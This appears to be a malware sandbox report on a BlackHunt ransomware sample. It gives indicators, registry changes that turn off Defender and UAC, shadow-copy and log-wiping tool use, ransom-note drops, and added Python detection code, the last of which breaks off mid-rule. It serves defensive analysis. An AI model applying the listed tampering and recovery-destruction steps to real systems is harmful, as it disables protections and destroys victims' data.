Analysis
max time kernel: 126s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20231222-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231222-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-01-2024 01:31
Static task: static1
Behavioral task: behavioral1
  Sample: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
  Resource: win10v2004-20231222-en
General
Target: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Size: 707KB
MD5: 715fcb3248681fb71545d800a6a701a5
SHA1: 1af52a08c7b0ee1b27d1bc9f4055524d80b2123b
SHA256: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87
SHA512: 94d84d77e997926097353799eba10d33945477ca8e98ea28bd8b11715dbaffa840a9b3b37dda6c61f7540187b811c18c52dc7e42b495be16b71d757640d18efa
SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1R8xvnh:6uaTmkZJ+naie5OTamgEoKxLWElh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is an NTFS feature present on every Windows edition, not only Windows Server: a persistent per-volume log of file changes that forensic tooling relies on to reconstruct which files were touched. Deleting it (fsutil.exe is the tool used here) destroys that record before investigators get to the host.
pid | Process
9524 | fsutil.exe
7540 | fsutil.exe
Modifies Windows Defender Real-time Protection settings 2 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
UAC bypass 1 IoCs
Setting EnableLUA to 0 turns User Account Control off system-wide from the next logon; it is a policy tamper that needs administrative rights already, not an exploit of UAC.
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Clears Windows event logs 1 TTPs 5 IoCs
pid | Process
5404 | wevtutil.exe
12124 | wevtutil.exe
11360 | wevtutil.exe
11664 | wevtutil.exe
6368 | wevtutil.exe
Deletes shadow copies 2 TTPs
Ransomware deletes Volume Shadow Copies so that encrypted files cannot be restored from local snapshots, inhibiting system recovery.
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid | Process
9304 | bcdedit.exe
9368 | bcdedit.exe
10564 | bcdedit.exe
6400 | bcdedit.exe
Renames multiple (3368) files with added filename extension
Mass renames that append one new extension to existing file names are the typical footprint of a ransomware encryptor rewriting every reachable file on the system.
Runs wbadmin.exe 2 IoCs
pid | Process
9520 | wbadmin.exe
8232 | wbadmin.exe
Disables Task Manager via registry modification
Disables use of System Restore points 1 TTPs
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | cmd.exe
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" | reg.exe
Checks whether UAC is enabled 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\M: | fsutil.exe
File opened (read-only) | \??\K: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\S: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\H: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\F: | vssadmin.exe
File opened (read-only) | \??\W: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\E: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\P: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\G: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\F: | vssadmin.exe
File opened (read-only) | \??\Q: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\U: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\B: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\Y: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\V: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\N: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\L: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\J: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\Z: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\M: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\I: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\T: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\O: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\A: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\X: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
File opened (read-only) | \??\F: | fsutil.exe
File opened (read-only) | \??\R: | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
9 | ip-api.com
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Drops file in Program Files directory 64 IoCs
Process for every row: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
description | ioc
File opened for modification | C:\Program Files\7-Zip\Lang\sv.txt
File created | C:\Program Files\VideoLAN\VLC\locale\ckb\#BlackHunt_Private.key
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-down_32.svg
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\scan-2x.png
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sl-si\#BlackHunt_Private.key
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ro-ro\#BlackHunt_ReadMe.hta
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-ae\#BlackHunt_ReadMe.hta
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\#BlackHunt_Private.key
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\ui-strings.js
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fr-ma\#BlackHunt_ReadMe.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\#BlackHunt_ReadMe.txt
File created | C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#BlackHunt_Private.key
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\#BlackHunt_ReadMe.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\#BlackHunt_ReadMe.txt
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\ui-strings.js
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-sl\#BlackHunt_ReadMe.hta
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\#BlackHunt_ReadMe.hta
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\en-gb\#BlackHunt_Private.key
File opened for modification | C:\Program Files\Java\jdk-1.8\legal\jdk\zlib.md
File created | C:\Program Files\VideoLAN\VLC\locale\nl\#BlackHunt_ReadMe.hta
File created | C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#BlackHunt_ReadMe.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-sl\#BlackHunt_Private.key
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\ui-strings.js
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\#BlackHunt_ReadMe.hta
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\#BlackHunt_Private.key
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\af_get.svg
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\faf_icons.png
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\#BlackHunt_Private.key
File created | C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#BlackHunt_ReadMe.hta
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_radio_unselected_18.svg
File created | C:\Program Files\Java\jdk-1.8\lib\#BlackHunt_ReadMe.txt
File opened for modification | C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\#BlackHunt_ReadMe.hta
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\#BlackHunt_ReadMe.hta
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\#BlackHunt_ReadMe.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-gb\#BlackHunt_ReadMe.hta
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-fr\#BlackHunt_ReadMe.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\#BlackHunt_Private.key
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ja-jp\ui-strings.js
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ms_get.svg
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hr-hr\#BlackHunt_ReadMe.hta
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ru-ru\#BlackHunt_ReadMe.hta
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\sv-se\#BlackHunt_Private.key
File opened for modification | C:\Program Files\7-Zip\Lang\pl.txt
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\logging.properties
File created | C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#BlackHunt_ReadMe.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\#BlackHunt_Private.key
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ro-ro\#BlackHunt_Private.key
File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h
File created | C:\Program Files\VideoLAN\VLC\locale\ks_IN\#BlackHunt_ReadMe.txt
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\custom_poster.png
File created | C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#BlackHunt_Private.key
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\ui-strings.js
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner.gif
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ro-ro\#BlackHunt_Private.key
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sl-si\#BlackHunt_ReadMe.hta
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-si\#BlackHunt_ReadMe.hta
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-sl\#BlackHunt_Private.key
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sv_get.svg
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\#BlackHunt_Private.key
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\he-il\#BlackHunt_Private.key
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pl_get.svg
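The two file-system signatures above (the 3,368 extension-appending renames and the ransom-note files dropped into every directory the sample walks) are the pattern a file-telemetry detection should key on, rather than any one path. The following is an added example written for this page, not Triage code and not part of the report: it scores a stream of file events per process, counting renames that append a single new extension and the number of distinct directories that receive a note. The event tuple format, the thresholds, and the `.Hunt2` extension used as the appended suffix are assumptions (the report registers a `.Hunt2` file class but does not print a renamed file name); the telemetry is constructed.

```python
"""Flag the file-system pattern described in the report: thousands of renames
that append one new extension, plus a ransom note dropped into every folder.
Added example; event stream below is constructed and the '.Hunt2' extension
is assumed from the file-class registration the sample performs."""
import ntpath
import re
from collections import Counter, defaultdict

SAMPLE = "fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe"
NOTE_NAMES = {"#BlackHunt_ReadMe.txt", "#BlackHunt_ReadMe.hta", "#BlackHunt_Private.key"}
_EXT = re.compile(r"^\.[A-Za-z0-9_]{1,16}$")


def added_extension(old_path, new_path):
    """Extension appended by a rename (e.g. '.Hunt2'), or None when the rename
    changed the name in any other way (ordinary 'save as', move, etc.)."""
    old_name, new_name = ntpath.basename(old_path), ntpath.basename(new_path)
    if not new_name.startswith(old_name):
        return None
    suffix = new_name[len(old_name):]
    return suffix if _EXT.match(suffix) else None


def analyze(events, rename_threshold=50, note_dir_threshold=10):
    """events: iterable of (op, process, path, new_path); op is 'create',
    'modify' or 'rename' (new_path set only for renames).  Returns one finding
    per process whose appended-extension renames or note fan-out cross a
    threshold (thresholds are assumptions, tune them to the fleet)."""
    ext_counts = defaultdict(Counter)   # process -> Counter of appended extensions
    note_dirs = defaultdict(set)        # process -> directories that received a note
    for op, proc, path, new_path in events:
        if op == "create" and ntpath.basename(path) in NOTE_NAMES:
            note_dirs[proc].add(ntpath.dirname(path).lower())
        elif op == "rename" and new_path:
            ext = added_extension(path, new_path)
            if ext:
                ext_counts[proc][ext] += 1
    findings = []
    for proc in sorted(set(ext_counts) | set(note_dirs)):
        top = ext_counts[proc].most_common(1)
        ext, renames = top[0] if top else (None, 0)
        dirs = len(note_dirs[proc])
        if renames >= rename_threshold or dirs >= note_dir_threshold:
            findings.append({"process": proc, "extension": ext,
                             "renames": renames, "note_dirs": dirs})
    return findings


def build_sample_events():
    """Constructed telemetry: the sample encrypts 120 documents across 12
    folders and drops all three note files in each; Explorer renames a few
    files to .bak and Notepad edits one, which must not be flagged."""
    events = []
    for d in range(12):
        folder = f"C:\\Users\\Admin\\Documents\\Project{d}"
        for i in range(10):
            src = f"{folder}\\report{i}.docx"
            events.append(("rename", SAMPLE, src, src + ".Hunt2"))
        for note in sorted(NOTE_NAMES):
            events.append(("create", SAMPLE, f"{folder}\\{note}", None))
    for i in range(3):
        events.append(("rename", "explorer.exe",
                       f"C:\\Users\\Admin\\Desktop\\old{i}.txt",
                       f"C:\\Users\\Admin\\Desktop\\old{i}.txt.bak"))
    events.append(("modify", "notepad.exe", "C:\\Users\\Admin\\Desktop\\notes.txt", None))
    return events


if __name__ == "__main__":
    for finding in analyze(build_sample_events()):
        print(finding)
```

The note-directory count is the more robust of the two signals: an encryptor that renames in place without changing names still has to drop its note everywhere, whereas a backup tool that appends `.bak` to thousands of files will trip the rename counter alone.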
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 1 IoCs
pid | pid_target | Process | procid_target
4960 | 6964 | WerFault.exe | 297
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments. In this run, however, every query comes from vds.exe (the Windows Virtual Disk Service) rather than from the sample, so it is most likely a side effect of the shadow-copy and backup activity below and a weak indicator of sandbox detection.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | vds.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | vds.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
5912 | schtasks.exe
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
9240 | vssadmin.exe
9312 | vssadmin.exe
9680 | vssadmin.exe
9676 | vssadmin.exe
9352 | vssadmin.exe
6516 | vssadmin.exe
Kills process with taskkill 1 IoCs
pid | Process
11536 | taskkill.exe
Modifies registry class 9 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2 | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ | reg.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings | cmd.exe
Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2 | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ | reg.exe
Runs ping.exe 1 TTPs 1 IoCs
pid | Process
5332 | PING.EXE
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | Process
4536 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Suspicious use of AdjustPrivilegeToken 24 IoCs
description | pid | Process
Token: SeDebugPrivilege | 4536 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Token: SeRestorePrivilege | 4536 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Token: SeBackupPrivilege | 4536 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Token: SeTakeOwnershipPrivilege | 4536 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Token: SeAuditPrivilege | 4536 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Token: SeSecurityPrivilege | 4536 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Token: SeIncBasePriorityPrivilege | 4536 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Token: SeBackupPrivilege | 8332 | vssvc.exe
Token: SeRestorePrivilege | 8332 | vssvc.exe
Token: SeAuditPrivilege | 8332 | vssvc.exe
Token: SeBackupPrivilege | 12776 | wbengine.exe
Token: SeRestorePrivilege | 12776 | wbengine.exe
Token: SeSecurityPrivilege | 12776 | wbengine.exe
Token: SeSecurityPrivilege | 5404 | wevtutil.exe
Token: SeBackupPrivilege | 5404 | wevtutil.exe
Token: SeSecurityPrivilege | 12124 | wevtutil.exe
Token: SeBackupPrivilege | 12124 | wevtutil.exe
Token: SeSecurityPrivilege | 11360 | wevtutil.exe
Token: SeBackupPrivilege | 11360 | wevtutil.exe
Token: SeSecurityPrivilege | 11664 | wevtutil.exe
Token: SeBackupPrivilege | 11664 | wevtutil.exe
Token: SeSecurityPrivilege | 6368 | wevtutil.exe
Token: SeBackupPrivilege | 6368 | wevtutil.exe
Token: SeDebugPrivilege | 11536 | taskkill.exe
Suspicious use of WriteProcessMemory 64 IoCs
Each write below is recorded as two events in the sandbox log, giving the 64-IoC count for 32 parent-to-child writes.
pid | target pid | Process | procid_target | events
4536 | 3216 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 92 | 2
4536 | 3008 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 94 | 2
4536 | 636 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 96 | 2
4536 | 828 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 98 | 2
3216 | 4988 | cmd.exe | 100 | 2
4536 | 1940 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 101 | 2
3008 | 4784 | cmd.exe | 107 | 2
4536 | 5112 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 106 | 2
4536 | 4380 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 103 | 2
636 | 620 | cmd.exe | 108 | 2
4536 | 4228 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 109 | 2
828 | 2032 | cmd.exe | 111 | 2
4536 | 4300 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 112 | 2
5112 | 1116 | cmd.exe | 114 | 2
4380 | 2208 | cmd.exe | 115 | 2
4536 | 3256 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 116 | 2
1940 | 3660 | cmd.exe | 118 | 2
4228 | 1316 | cmd.exe | 120 | 2
4536 | 3392 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 182 | 2
4300 | 4872 | cmd.exe | 122 | 2
4536 | 2400 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 123 | 2
3256 | 2416 | cmd.exe | 125 | 2
4536 | 1528 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 126 | 2
3392 | 4152 | cmd.exe | 128 | 2
4536 | 4600 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 129 | 2
2400 | 4876 | cmd.exe | 132 | 2
4536 | 2052 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 193 | 2
1528 | 4648 | cmd.exe | 134 | 2
4536 | 2764 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 135 | 2
4536 | 2900 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 137 | 2
4600 | 1444 | cmd.exe | 185 | 2
4536 | 116 | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe | 140 | 2
System policy modification 1 TTPs 3 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
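The signatures above list fsutil.exe, vssadmin.exe, wbadmin.exe, bcdedit.exe and wevtutil.exe by PID only; what a detection engineer needs is the argument pattern that separates their destructive use from routine administration (`vssadmin list shadows` is harmless, `vssadmin delete shadows` is not). The following is an added example for this page, not sandbox output: a small classifier that maps process command lines to the report's signature names and the corresponding ATT&CK technique, unwrapping the `cmd.exe /c` indirection the process tree uses, and a rule that fires only when shadow-copy deletion is combined with a second recovery-inhibition step. The sample command lines are constructed canonical forms of these commands, not the arguments from this run (the report does not show them); the labels and thresholds are the example's own.

```python
"""Classify process command lines for the recovery-inhibition and log-clearing
behaviour this report attributes to fsutil, vssadmin, wbadmin, bcdedit and
wevtutil.  Added example; SAMPLE_COMMANDS are constructed, not from the run."""
import ntpath
import re

# (tool basename, argument pattern, signature label, ATT&CK technique)
RULES = [
    ("vssadmin.exe", r"\bdelete\s+shadows\b", "Deletes shadow copies", "T1490"),
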